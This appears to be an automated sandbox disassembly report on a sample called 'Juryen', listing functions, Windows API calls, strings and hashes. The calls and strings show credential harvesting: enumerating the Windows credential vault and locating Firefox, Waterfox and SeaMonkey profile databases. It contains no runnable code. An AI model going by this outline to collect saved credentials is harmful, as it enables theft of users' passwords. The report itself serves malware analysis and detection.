                                                                    • Opcode ID: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                    • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                    • Opcode Fuzzy Hash: 808217d469f29374b6c53add07773bde8ba425e7a3f83fd710eb9a2b8acfca27
                                                                    • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                    APIs
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                      • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                    • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                    • wcslen.MSVCRT ref: 0040BE06
                                                                    • wcsncmp.MSVCRT ref: 0040BE38
                                                                    • memset.MSVCRT ref: 0040BE91
                                                                    • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                    • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                    • wcschr.MSVCRT ref: 0040BF24
                                                                    • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                    • String ID:
                                                                    • API String ID: 697348961-0
                                                                    • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                    • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                    • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                    • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403CBF
                                                                    • memset.MSVCRT ref: 00403CD4
                                                                    • memset.MSVCRT ref: 00403CE9
                                                                    • memset.MSVCRT ref: 00403CFE
                                                                    • memset.MSVCRT ref: 00403D13
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 00403DDA
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                    • String ID: Waterfox$Waterfox\Profiles
                                                                    • API String ID: 4039892925-11920434
                                                                    • Opcode ID: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                    • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                    • Opcode Fuzzy Hash: 74213e66932f07ea3ad059af1798c87c438cc92db4e0e7cdb609a7dadd567ada
                                                                    • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403E50
                                                                    • memset.MSVCRT ref: 00403E65
                                                                    • memset.MSVCRT ref: 00403E7A
                                                                    • memset.MSVCRT ref: 00403E8F
                                                                    • memset.MSVCRT ref: 00403EA4
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 00403F6B
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                    • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                    • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                    • API String ID: 4039892925-2068335096
                                                                    • Opcode ID: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                    • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                    • Opcode Fuzzy Hash: fb8d06a7ed3fa35f71d99b938417e45633d605fe1ac21657eef3450a4ac41d2d
                                                                    • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403FE1
                                                                    • memset.MSVCRT ref: 00403FF6
                                                                    • memset.MSVCRT ref: 0040400B
                                                                    • memset.MSVCRT ref: 00404020
                                                                    • memset.MSVCRT ref: 00404035
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                      • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                      • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                      • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                    • memset.MSVCRT ref: 004040FC
                                                                      • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                      • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcscpy$wcslen$CloseFolderPathSpecial_snwprintfmemcpywcscat
                                                                    • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                    • API String ID: 4039892925-3369679110
                                                                    • Opcode ID: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                    • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                    • Opcode Fuzzy Hash: a800c2c864e82bb525ebc7d4b700ce70e1897f56eef446e490fc18a40a012dd3
                                                                    • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                    APIs
                                                                    • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy
                                                                    • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                    • API String ID: 3510742995-2641926074
                                                                    • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                    • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                    • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                    • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                    APIs
                                                                      • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                      • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                      • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                    • memset.MSVCRT ref: 004033B7
                                                                    • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                                    • wcscmp.MSVCRT ref: 004033FC
                                                                    • _wcsicmp.MSVCRT ref: 00403439
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                                    • String ID: $0.@
                                                                    • API String ID: 2758756878-1896041820
                                                                    • Opcode ID: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                    • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                    • Opcode Fuzzy Hash: 90c1bd1f00aab923b8f25d437f952d518439630af4329cefc1ee53129d619d56
                                                                    • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                    APIs
                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 2941347001-0
                                                                    • Opcode ID: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                    • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                    • Opcode Fuzzy Hash: 80e482451f5ca37e8404f50e4d067f365766b265f7642500ec0655012d68ebd6
                                                                    • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00403C09
                                                                    • memset.MSVCRT ref: 00403C1E
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                      • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                    • wcscat.MSVCRT ref: 00403C47
                                                                      • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                      • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                      • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                    • wcscat.MSVCRT ref: 00403C70
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcscat$CloseFolderPathSpecialwcscpywcslen
                                                                    • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                    • API String ID: 1534475566-1174173950
                                                                    • Opcode ID: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                    • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                    • Opcode Fuzzy Hash: 8452d1ff202b3ecdc32f03c4689b339ff6508c8f38893fabe83067ed25a4ac21
                                                                    • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                    APIs
                                                                      • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                    • SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                    • memset.MSVCRT ref: 00414C87
                                                                    • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                    • wcscpy.MSVCRT ref: 00414CFC
                                                                      • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                    Strings
                                                                    • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressCloseFolderPathProcSpecialVersionmemsetwcscpy
                                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                    • API String ID: 71295984-2036018995
                                                                    • Opcode ID: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                    • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                    • Opcode Fuzzy Hash: f400cfab40eb781a7377af97b809c3f02e1ff83a00fe342fd0a4f0569afe9d8a
                                                                    • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                    APIs
                                                                    • wcschr.MSVCRT ref: 00414458
                                                                    • _snwprintf.MSVCRT ref: 0041447D
                                                                    • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                    • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                    • String ID: "%s"
                                                                    • API String ID: 1343145685-3297466227
                                                                    • Opcode ID: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                    • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                    • Opcode Fuzzy Hash: aabbe202c5f79078aea71dac5ab2605718744c8b92afc7520f4e067a7367162e
                                                                    • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                    • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                    • API String ID: 1714573020-3385500049
                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004087D6
                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                    • memset.MSVCRT ref: 00408828
                                                                    • memset.MSVCRT ref: 00408840
                                                                    • memset.MSVCRT ref: 00408858
                                                                    • memset.MSVCRT ref: 00408870
                                                                    • memset.MSVCRT ref: 00408888
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 2911713577-0
                                                                    • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                    • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                    APIs
                                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp
                                                                    • String ID: @ $SQLite format 3
                                                                    • API String ID: 1475443563-3708268960
                                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                    Memory Dump Source
                                                                    • Source File: 0000000D.00000002.1905404800.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                     • Associated: 0000000D.00000002.1905404800.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_13_2_400000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpqsort
                                                                    • String ID: /nosort$/sort
                                                                    • API String ID: 1579243037-1578091866
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040E60F
                                                                    • memset.MSVCRT ref: 0040E629
